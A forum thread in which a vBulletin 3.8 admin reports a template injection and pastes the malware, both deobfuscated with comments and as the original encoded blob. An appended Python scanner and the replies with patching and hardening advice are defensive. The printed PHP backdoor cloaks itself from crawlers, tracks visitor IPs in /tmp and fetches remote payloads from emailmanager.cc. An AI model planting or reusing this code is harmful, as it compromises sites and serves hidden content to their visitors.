vB 3.8 Injection ?

  • kau
    Senior Member
    • Jul 2002
    • 772

    vB 3.8 Injection ?

    Anyone had issues lately?

    I had a pretty locked down vB 3.8 forum get hit tonight. Announcements turned off, .htaccess on AdminCP, only one Admin account. Not that many plugins, no vBSEO.

    They injected it into the headinclude template and here it is:

    Unencoded, unobfuscated code:

    // Per-IP gate: appends each visitor's IP to a hidden file under /tmp and
    // returns true only the first time an IP is seen, so the payload is served
    // once per visitor (the file is reset once it grows past ~1 MB).
    function bIREgRNVk($p) {
        $m = false;
        $file_d = '/tmp/._tmpnIPmYXXd';
        $ip_l = (string)ip2long($p);
        if(file_exists($file_d) and @is_writable($file_d) and (($size_f = @filesize($file_d)) > 0)) {
            $data = file_get_contents($file_d);
            $data .= "$ip_l,";
            if(substr_count($data,"$ip_l,") <= 1) $m = true;
            if($size_f > 1000000) $data = "$ip_l,";
            file_put_contents($file_d,$data);
            return $m;
        } else return true;
    }

    // Remote fetch: $h is the hex-escaped host "emailmanager.cc". Sends a key, the
    // visitor IP and the User-Agent base64-encoded in the request path, then
    // returns whatever sits between the two marker strings in the reply (base64-decoded).
    function ddGFJZYNg($i) {
        $k='oVOgAdDKxscvVubUYsxi';
        $h="\x65\x6d\x61\x69\x6c\x6d\x61\x6e\x61\x67\x65\x72\x2e\x63\x63";
        $fp=@fsockopen($h,80,$e,$er,4);
        if(!$fp){
            @fclose($fp);
            return '';
        }else{
            @fputs($fp,"GET /".mt_rand(0,99999999)."?".base64_encode(implode('@@',array($k,$i,$_SERVER['HTTP_USER_AGENT'])))." HTTP/1.1\r\nHost: $h\r\nConnection: Close\r\n\r\n");
            $a='';
            while(!feof($fp)){
                $a.=@fgets($fp,512);
                if(stristr($a,'400 Bad')){
                    @fclose($fp);
                    return '';
                }elseif(stristr($a,'200 Ok')){
                    if(preg_match("/YmYcarAutsgliT(.*?)piXuSiGnCczjgJZ/i",$a,$ret)) {
                        @fclose($fp);
                        return(base64_decode(trim($ret['1'])));
                    }
                }
            }
            @fclose($fp);
        }
        return '';
    }

    // Unused helper: returns the X-Forwarded-For header, if any.
    function bXvuStv() {
        $ip = '';
        return @getenv('HTTP_X_FORWARDED_FOR');
    }

    // Cloaking: true only when the visitor arrived from a search engine or social
    // site AND the User-Agent looks like a real browser. Admins testing their own
    // site (no referer) never see the payload.
    function ZgGohvIGL() {
        if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|excite|lycos|myspace|alexa|doubleclick|tinyurl|search|blekko|duckduckgo|facebook|info|wow#i',$_SERVER['HTTP_REFERER'])) {
            if(preg_match('#msie|firefox|opera|chrome|trident|edge|safari#i',$_SERVER['HTTP_USER_AGENT'])) return true;
        }
    }

    // Crawler exclusion: skips visitors from these IP prefixes (largely Google ranges)
    // so the injected content is not seen by the search engines themselves.
    function OtEASRm($p) {
        $a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.','72.14.','66.249.','66.102.','64.233.');
        foreach($a as $b) {
            if(preg_match("/^$b/i",$p)) return true;
        }
    }

    // Entry point of the create_function() body: referer + browser check, not a
    // crawler IP, first visit from this IP => return the remote payload into the
    // headinclude template; otherwise return nothing.
    if(!empty($_SERVER['HTTP_REFERER']) and !empty($_SERVER['HTTP_ACCEPT']) and !empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
        if(ZgGohvIGL() and ($p =@getenv('REMOTE_ADDR')) and !OtEASRm($p) and bIREgRNVk($p)) {
            return ddGFJZYNg($p);
        }
    }
    return '';

    Original block of code in the template:



    {${$aHAJNcpd="\142"."\x61".chr(115)."\145"."\66".chr(52).chr(95)."\x64".chr(101)."\x63"."\ x6f".chr(100)."\145"}}{${$JAeJayc="\143"."\x72"."\x65".chr(97).chr(116)."\x65"."\137".chr( 102).chr(117)."\156"."\x63"."\x74"."\151".chr(111).chr(110)}}{${$KIuvfJoMt=$JAeJayc(null,$ aHAJNcpd("cmV0dXJuIEBldmFsKGJhc2U2NF9kZWNvZGUoJ1puVnVZM1JwYjI0Z1lrbFNSV2RTVGxacktDUndLU0I3 RFFva2JTQTlJR1poYkhObE93MEtKR1pwYkdWZlpDQTlJQ2N2ZEcxd0x5NWZkRzF3YmtsUWJWbFlXR1FuT3cwS0pHbH dYMndnUFNBb2MzUnlhVzVuS1dsd01teHZibWNvSkhBcE93MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1ZmWkNr Z1lXNWtJRUJwYzE5M2NtbDBZV0pzWlNna1ptbHNaVjlrS1NCaGJtUWdLQ2drYzJsNlpWOW1JRDBnUUdacGJHVnphWH BsS0NSbWFXeGxYMlFwS1NBK0lEQXBLU0I3RFFvZ0pHUmhkR0VnUFNCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lna1pt bHNaVjlrS1RzTkNpQWtaR0YwWVNBdVBTQWlKR2x3WDJ3c0lqc05DaUFnYVdZb2MzVmljM1J5WDJOdmRXNTBLQ1JrWV hSaExDSWthWEJmYkN3aUtTQThQU0F4S1NBa2JTQTlJSFJ5ZFdVN0RRb2dJR2xtS0NSemFYcGxYMllnUGlBeE1EQXdN REF3S1NBa1pHRjBZU0E5SUNJa2FYQmZiQ3dpT3cwS0lDQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5Z2tabWxzWlY5a0 xDUmtZWFJoS1RzTkNpQWdjbVYwZFhKdUlDUnRPdzBLSUgwZ1pXeHpaU0J5WlhSMWNtNGdkSEoxWlRzTkNuME5DbVox Ym1OMGFXOXVJR1JrUjBaS1dsbE9aeWdrYVNrZ2V3MEtKR3M5SjI5V1QyZEJaRVJMZUhOamRsWjFZbFZaYzNocEp6c0 5DaVJvUFNKY2VEWTFYSGcyWkZ4NE5qRmNlRFk1WEhnMlkxeDRObVJjZURZeFhIZzJaVng0TmpGY2VEWTNYSGcyTlZ4 NE56SmNlREpsWEhnMk0xeDROak1pT3cwS0pHWndQVUJtYzI5amEyOXdaVzRvSkdnc09EQXNKR1VzSkdWeUxEUXBPdz BLYVdZb0lTUm1jQ2w3RFFwQVptTnNiM05sS0NSbWNDazdEUXB5WlhSMWNtNGdKeWM3RFFwOVpXeHpaWHNOQ2tCbWNI VjBjeWdrWm5Bc0lrZEZWQ0F2SWk1dGRGOXlZVzVrS0RBc09UazVPVGs1T1RrcExpSS9JaTVpWVhObE5qUmZaVzVqYj JSbEtHbHRjR3h2WkdVb0owQkFKeXhoY25KaGVTZ2theXdrYVN3a1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhS VTVVSjEwcEtTa3VJaUJJVkZSUUx6RXVNVnh5WEc1SWIzTjBPaUFrYUZ4eVhHNURiMjV1WldOMGFXOXVPaUJEYkc5el pWeHlYRzVjY2x4dUlpazdEUW9rWVQwbkp6c05DbmRvYVd4bEtDRm1aVzltS0NSbWNDa3BldzBLSkdFdVBVQm1aMlYw Y3lna1puQXNOVEV5S1RzTkNtbG1LSE4wY21semRISW9KR0VzSnpRd01DQkNZV1FuS1NsN0RRcEFabU5zYjNObEtDUm 
1jQ2s3RFFweVpYUjFjbTRnSnljN0RRcDlaV3h6WldsbUtITjBjbWx6ZEhJb0pHRXNKekl3TUNCUGF5Y3BLWHNOQ2lC cFppaHdjbVZuWDIxaGRHTm9LQ0l2V1cxWlkyRnlRWFYwYzJkc2FWUW9MaW8vS1hCcFdIVlRhVWR1UTJONmFtZEtXaT lwSWl3a1lTd2tjbVYwS1NrZ2V3MEtDU0JBWm1Oc2IzTmxLQ1JtY0NrN0RRb0pJSEpsZEhWeWJpaGlZWE5sTmpSZlpH VmpiMlJsS0hSeWFXMG9KSEpsZEZzbk1TZGRLU2twT3cwS0lIME5DbjBOQ24wTkNrQm1ZMnh2YzJVb0pHWndLVHNOQ2 4wTkNuSmxkSFZ5YmlBbkp6c05DbjBOQ21aMWJtTjBhVzl1SUdKWWRuVlRkSFlvS1NCN0RRb2thWEFnUFNBbkp6c05D bkpsZEhWeWJpQkFaMlYwWlc1MktDZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgwWlBVaWNwT3cwS2ZRMEtablZ1WTNScG IyNGdXbWRIYjJoMlNVZE1LQ2tnZXcwS2FXWW9jSEpsWjE5dFlYUmphQ2duSTJkdmIyZHNaWHh0YzI1OGJHbDJaWHho YkhSaGRtbHpkR0Y4WVhOcmZIbGhhRzl2ZkdGdmJIeGlhVzVuZkdWNFlXeGxZV1I4WlhoamFYUmxmR3g1WTI5emZHMT VjM0JoWTJWOFlXeGxlR0Y4Wkc5MVlteGxZMnhwWTJ0OGRHbHVlWFZ5Ykh4elpXRnlZMmg4WW14bGEydHZmR1IxWTJ0 a2RXTnJaMjk4Wm1GalpXSnZiMnQ4YVc1bWIzeDNiM2NqYVNjc0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaW RkS1NrZ2V3MEtJR2xtS0hCeVpXZGZiV0YwWTJnb0p5TnRjMmxsZkdacGNtVm1iM2g4YjNCbGNtRjhZMmh5YjIxbGZI UnlhV1JsYm5SOFpXUm5aWHh6WVdaaGNta2phU2NzSkY5VFJWSldSVkpiSjBoVVZGQmZWVk5GVWw5QlIwVk9WQ2RkS1 NrZ2NtVjBkWEp1SUhSeWRXVTdEUW9nZlEwS2ZRMEtablZ1WTNScGIyNGdUM1JGUVZOU2JTZ2tjQ2tnZXcwS0pHRWdQ U0JoY25KaGVTZ25NakUyTGpJek9TNG5MQ2N5TURrdU9EVXVKeXduTVRjekxqSTFOUzRuTENjeE56TXVNVGswTGljc0 p6ZzVMakl3Tnk0bkxDYzNOQzR4TWpVdUp5d25Oekl1TVRRdUp5d25Oall1TWpRNUxpY3NKelkyTGpFd01pNG5MQ2My TkM0eU16TXVKeWs3RFFwbWIzSmxZV05vS0NSaElHRnpJQ1JpS1NCN0RRb2dhV1lvY0hKbFoxOXRZWFJqYUNnaUwxNG tZaTlwSWl3a2NDa3BJSEpsZEhWeWJpQjBjblZsT3cwS0lIME5DbjBOQ21sbUtDRmxiWEIwZVNna1gxTkZVbFpGVWxz blNGUlVVRjlTUlVaRlVrVlNKMTBwSUdGdVpDQWhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVKMT BwSUdGdVpDQWhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVYMHhCVGtkVlFVZEZKMTBwS1NCN0RR b2dhV1lvV21kSGIyaDJTVWRNS0NrZ1lXNWtJQ2drY0NBOVFHZGxkR1Z1ZGlnblVrVk5UMVJGWDBGRVJGSW5LU2tnWV c1a0lDRlBkRVZCVTFKdEtDUndLU0JoYm1RZ1lrbFNSV2RTVGxacktDUndLU2tnZXcwS0lISmxkSFZ5YmlCa1pFZEdT 
bHBaVG1jb0pIQXBPdzBLSUgwTkNuME5DbkpsZEhWeWJpQW5KenM9JykpOw=="))}}{$KIuvfJoMt()}{${$aHAJNcp d="\142"."\x61".chr(115)."\145"."\66".chr(52).chr(95)."\x64".chr(101)."\x63"."\x6f".chr(10 0)."\145"}}{${$JAeJayc="\143"."\x72"."\x65".chr(97).chr(116)."\x65"."\137".chr(102).chr(11 7)."\156"."\x63"."\x74"."\151".chr(111).chr(110)}}{${$KIuvfJoMt=$JAeJayc(null,$aHAJNcpd("c mV0dXJuIEBldmFsKGJhc2U2NF9kZWNvZGUoJ1puVnVZM1JwYjI0Z1lrbFNSV2RTVGxacktDUndLU0I3RFFva2JTQTl JR1poYkhObE93MEtKR1pwYkdWZlpDQTlJQ2N2ZEcxd0x5NWZkRzF3YmtsUWJWbFlXR1FuT3cwS0pHbHdYMndnUFNBb 2MzUnlhVzVuS1dsd01teHZibWNvSkhBcE93MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1ZmWkNrZ1lXNWtJRUJ wYzE5M2NtbDBZV0pzWlNna1ptbHNaVjlrS1NCaGJtUWdLQ2drYzJsNlpWOW1JRDBnUUdacGJHVnphWHBsS0NSbWFXe GxYMlFwS1NBK0lEQXBLU0I3RFFvZ0pHUmhkR0VnUFNCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lna1ptbHNaVjlrS1R zTkNpQWtaR0YwWVNBdVBTQWlKR2x3WDJ3c0lqc05DaUFnYVdZb2MzVmljM1J5WDJOdmRXNTBLQ1JrWVhSaExDSWthW EJmYkN3aUtTQThQU0F4S1NBa2JTQTlJSFJ5ZFdVN0RRb2dJR2xtS0NSemFYcGxYMllnUGlBeE1EQXdNREF3S1NBa1p HRjBZU0E5SUNJa2FYQmZiQ3dpT3cwS0lDQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5Z2tabWxzWlY5a0xDUmtZWFJoS 1RzTkNpQWdjbVYwZFhKdUlDUnRPdzBLSUgwZ1pXeHpaU0J5WlhSMWNtNGdkSEoxWlRzTkNuME5DbVoxYm1OMGFXOXV JR1JrUjBaS1dsbE9aeWdrYVNrZ2V3MEtKR3M5SjI5V1QyZEJaRVJMZUhOamRsWjFZbFZaYzNocEp6c05DaVJvUFNKY 2VEWTFYSGcyWkZ4NE5qRmNlRFk1WEhnMlkxeDRObVJjZURZeFhIZzJaVng0TmpGY2VEWTNYSGcyTlZ4NE56SmNlREp sWEhnMk0xeDROak1pT3cwS0pHWndQVUJtYzI5amEyOXdaVzRvSkdnc09EQXNKR1VzSkdWeUxEUXBPdzBLYVdZb0lTU m1jQ2w3RFFwQVptTnNiM05sS0NSbWNDazdEUXB5WlhSMWNtNGdKeWM3RFFwOVpXeHpaWHNOQ2tCbWNIVjBjeWdrWm5 Bc0lrZEZWQ0F2SWk1dGRGOXlZVzVrS0RBc09UazVPVGs1T1RrcExpSS9JaTVpWVhObE5qUmZaVzVqYjJSbEtHbHRjR 3h2WkdVb0owQkFKeXhoY25KaGVTZ2theXdrYVN3a1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhSVTVVSjEwcEt Ta3VJaUJJVkZSUUx6RXVNVnh5WEc1SWIzTjBPaUFrYUZ4eVhHNURiMjV1WldOMGFXOXVPaUJEYkc5elpWeHlYRzVjY 2x4dUlpazdEUW9rWVQwbkp6c05DbmRvYVd4bEtDRm1aVzltS0NSbWNDa3BldzBLSkdFdVBVQm1aMlYwY3lna1puQXN 
OVEV5S1RzTkNtbG1LSE4wY21semRISW9KR0VzSnpRd01DQkNZV1FuS1NsN0RRcEFabU5zYjNObEtDUm1jQ2s3RFFwe VpYUjFjbTRnSnljN0RRcDlaV3h6WldsbUtITjBjbWx6ZEhJb0pHRXNKekl3TUNCUGF5Y3BLWHNOQ2lCcFppaHdjbVZ uWDIxaGRHTm9LQ0l2V1cxWlkyRnlRWFYwYzJkc2FWUW9MaW8vS1hCcFdIVlRhVWR1UTJONmFtZEtXaTlwSWl3a1lTd 2tjbVYwS1NrZ2V3MEtDU0JBWm1Oc2IzTmxLQ1JtY0NrN0RRb0pJSEpsZEhWeWJpaGlZWE5sTmpSZlpHVmpiMlJsS0h SeWFXMG9KSEpsZEZzbk1TZGRLU2twT3cwS0lIME5DbjBOQ24wTkNrQm1ZMnh2YzJVb0pHWndLVHNOQ24wTkNuSmxkS FZ5YmlBbkp6c05DbjBOQ21aMWJtTjBhVzl1SUdKWWRuVlRkSFlvS1NCN0RRb2thWEFnUFNBbkp6c05DbkpsZEhWeWJ pQkFaMlYwWlc1MktDZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgwWlBVaWNwT3cwS2ZRMEtablZ1WTNScGIyNGdXbWRIY jJoMlNVZE1LQ2tnZXcwS2FXWW9jSEpsWjE5dFlYUmphQ2duSTJkdmIyZHNaWHh0YzI1OGJHbDJaWHhoYkhSaGRtbHp kR0Y4WVhOcmZIbGhhRzl2ZkdGdmJIeGlhVzVuZkdWNFlXeGxZV1I4WlhoamFYUmxmR3g1WTI5emZHMTVjM0JoWTJWO FlXeGxlR0Y4Wkc5MVlteGxZMnhwWTJ0OGRHbHVlWFZ5Ykh4elpXRnlZMmg4WW14bGEydHZmR1IxWTJ0a2RXTnJaMjk 4Wm1GalpXSnZiMnQ4YVc1bWIzeDNiM2NqYVNjc0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaWRkS1NrZ2V3M EtJR2xtS0hCeVpXZGZiV0YwWTJnb0p5TnRjMmxsZkdacGNtVm1iM2g4YjNCbGNtRjhZMmh5YjIxbGZIUnlhV1JsYm5 SOFpXUm5aWHh6WVdaaGNta2phU2NzSkY5VFJWSldSVkpiSjBoVVZGQmZWVk5GVWw5QlIwVk9WQ2RkS1NrZ2NtVjBkW Ep1SUhSeWRXVTdEUW9nZlEwS2ZRMEtablZ1WTNScGIyNGdUM1JGUVZOU2JTZ2tjQ2tnZXcwS0pHRWdQU0JoY25KaGV TZ25NakUyTGpJek9TNG5MQ2N5TURrdU9EVXVKeXduTVRjekxqSTFOUzRuTENjeE56TXVNVGswTGljc0p6ZzVMakl3T nk0bkxDYzNOQzR4TWpVdUp5d25Oekl1TVRRdUp5d25Oall1TWpRNUxpY3NKelkyTGpFd01pNG5MQ2MyTkM0eU16TXV KeWs3RFFwbWIzSmxZV05vS0NSaElHRnpJQ1JpS1NCN0RRb2dhV1lvY0hKbFoxOXRZWFJqYUNnaUwxNGtZaTlwSWl3a 2NDa3BJSEpsZEhWeWJpQjBjblZsT3cwS0lIME5DbjBOQ21sbUtDRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRjl TUlVaRlVrVlNKMTBwSUdGdVpDQWhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVKMTBwSUdGdVpDQ WhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVYMHhCVGtkVlFVZEZKMTBwS1NCN0RRb2dhV1lvV21 kSGIyaDJTVWRNS0NrZ1lXNWtJQ2drY0NBOVFHZGxkR1Z1ZGlnblVrVk5UMVJGWDBGRVJGSW5LU2tnWVc1a0lDRlBkR 
VZCVTFKdEtDUndLU0JoYm1RZ1lrbFNSV2RTVGxacktDUndLU2tnZXcwS0lISmxkSFZ5YmlCa1pFZEdTbHBaVG1jb0p IQXBPdzBLSUgwTkNuME5DbkpsZEhWeWJpQW5KenM9JykpOw=="))}}{$KIuvfJoMt()
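Added example (not code from the thread, from kau, or from vBulletin): a small Python scanner that triages template bodies for the obfuscation pattern shown above, i.e. `{${$x="..."}}` wrappers that assemble function names from octal/hex escapes and chr(), create_function() over base64_decode(), and nested base64 layers, and that peels those layers statically without ever evaluating anything. The variable names in the constructed injected sample are taken from the post; the host `example.invalid`, the path `/tmp/._tmpEXAMPLE` and the inner PHP are constructed placeholders, not the blob from the post.

```python
"""Static triage of vBulletin template bodies for the injection pattern above."""
import base64
import re
import string

# Function names that have no business inside a vBulletin template.
SUSPICIOUS_FUNCS = {"base64_decode", "create_function", "eval", "assert",
                    "gzinflate", "fsockopen"}

# Indicators applied to the raw template and to every decoded base64 layer.
INDICATORS = [
    ("variable-variable call wrapper", re.compile(r"\{\$\{\$\w+\s*=")),
    ("create_function", re.compile(r"create_function", re.I)),
    ("base64_decode", re.compile(r"base64_decode", re.I)),
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("fsockopen", re.compile(r"fsockopen", re.I)),
    ("hex/octal-escaped string", re.compile(r'"(?:\\x[0-9a-fA-F]{2}|\\[0-7]{2,3}){3,}')),
    ("chr() concatenation", re.compile(r"chr\(\d+\)\s*\.")),
    ("hidden /tmp file", re.compile(r"/tmp/\._")),
    ("referer check (cloaking)", re.compile(r"HTTP_REFERER")),
]

_ASSIGN = re.compile(r"\{\$\{\$(\w+)\s*=([^}]*)\}\}")   # {${$name=EXPR}}
_SEG = re.compile(r'"((?:\\x[0-9a-fA-F]{2}|\\[0-7]{1,3}|[^"\\])*)"|chr\((\d+)\)')
_B64 = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def php_unescape(s):
    """Resolve PHP double-quoted \\xHH and \\ooo escapes to characters."""
    return re.sub(r"\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})",
                  lambda m: chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8)),
                  s)


def resolve_concat(expr):
    """Statically evaluate a PHP concatenation of string literals and chr() calls."""
    parts = []
    for m in _SEG.finditer(expr):
        parts.append(chr(int(m.group(2))) if m.group(2) is not None else php_unescape(m.group(1)))
    return "".join(parts)


def peel_base64(text, max_depth=4):
    """Return every base64 layer reachable from text that decodes to printable ASCII."""
    layers = []
    if max_depth == 0:
        return layers
    for m in _B64.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # random alphanumeric run, not a real base64 layer
        if decoded and all(c in string.printable for c in decoded):
            layers.append(decoded)
            layers.extend(peel_base64(decoded, max_depth - 1))
    return layers


def scan_template(body):
    """Sorted list of indicator names found in a template body or its decoded layers."""
    found = set()
    for layer in [body] + peel_base64(body):
        for name, rx in INDICATORS:
            if rx.search(layer):
                found.add(name)
        for _var, expr in _ASSIGN.findall(layer):
            resolved = resolve_concat(expr)      # e.g. $aHAJNcpd -> base64_decode
            if resolved in SUSPICIOUS_FUNCS:
                found.add("resolved name: " + resolved)
    return sorted(found)


# --- constructed samples (placeholders, not the blob from the post) ----------
INNER_PHP = "\n".join([
    r"function chk($p) { $file_d = '/tmp/._tmpEXAMPLE'; return true; }",
    r'$h="\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64";',  # "example.invalid"
    r"$fp=@fsockopen($h,80,$e,$er,4);",
    r"if(preg_match('#google|bing#i',$_SERVER['HTTP_REFERER'])) return chk($p);",
])
MIDDLE_PHP = "return @eval(base64_decode('%s'));" % base64.b64encode(INNER_PHP.encode()).decode()
INJECTED_TEMPLATE = (
    '<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style.css" />\n'
    r'{${$aHAJNcpd="\142"."\x61".chr(115)."\145"."\66".chr(52).chr(95)."\x64".chr(101)."\x63"."\x6f".chr(100)."\145"}}'
    r'{${$JAeJayc="\143"."\x72"."\x65".chr(97).chr(116)."\x65"."\137".chr(102).chr(117)."\156"."\x63"."\x74"."\151".chr(111).chr(110)}}'
    + '{${$KIuvfJoMt=$JAeJayc(null,$aHAJNcpd("' + base64.b64encode(MIDDLE_PHP.encode()).decode() + '"))}}{$KIuvfJoMt()}'
)
CLEAN_TEMPLATE = (
    '<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style.css" />\n'
    '<script type="text/javascript" src="clientscript/vbulletin_global.js"></script>\n'
)

if __name__ == "__main__":
    for title, body in (("headinclude (clean)", CLEAN_TEMPLATE), ("headinclude (injected)", INJECTED_TEMPLATE)):
        print(title, "->", scan_template(body) or "no indicators")
```

Feed it the uncompiled body of every template in every style (in vB3 that is the `template` table; I am assuming the `template_un` column holds the uncompiled source) and diff the result against a clean install. A clean template returns an empty list. The resolved-name check is what catches the first layer, where `create_function` and `base64_decode` never appear as literal text, and the base64 peeling surfaces the host and the `/tmp/._` path from the inner layers so they can be added to egress and file-integrity monitoring.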
  • Mark.B
    vBulletin Support
    • Feb 2004
    • 24287
    • 6.0.X

    #2
    No known security issues on vB3. What version of the software are you running? Anything less than 3.8.9 is considered insecure.
    MARK.B
    vBulletin Support
    ------------
    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com


    • Paul M
      Former Lead Developer
      vB.Com & vB.Org
      • Sep 2004
      • 9886

      #3
      Anything less than 3.8.9 is considered insecure.
      3.8.8 & 3.8.7 are currently patched with any reported issues.
      Baby, I was born this way


      • Set3sh
        Senior Member
        • Jan 2013
        • 243
        • 5.2.x

        #4
        Hello,

        Firstly, upgrade your PHP version (I think you are using an EOL version, which is practically an invitation to trouble) to the latest supported one.

        Secondly, disable the "fopen" function.

        Thirdly, create a separate folder for each of your websites to be used as a temporary environment (rather than using the /tmp partition), and make sure that folder can only be accessed by the user of that particular website.

        Another best practice is to make use of the built-in chroot functionality within PHP to limit the folder access rights of any script.

        You can also take this further by sanitizing any input etc.

        The above are just a few security best practices to prevent, minimize the damage from, and contain any malicious script running due to a flaw in a PHP-based application.

        Kind regards,
        George.
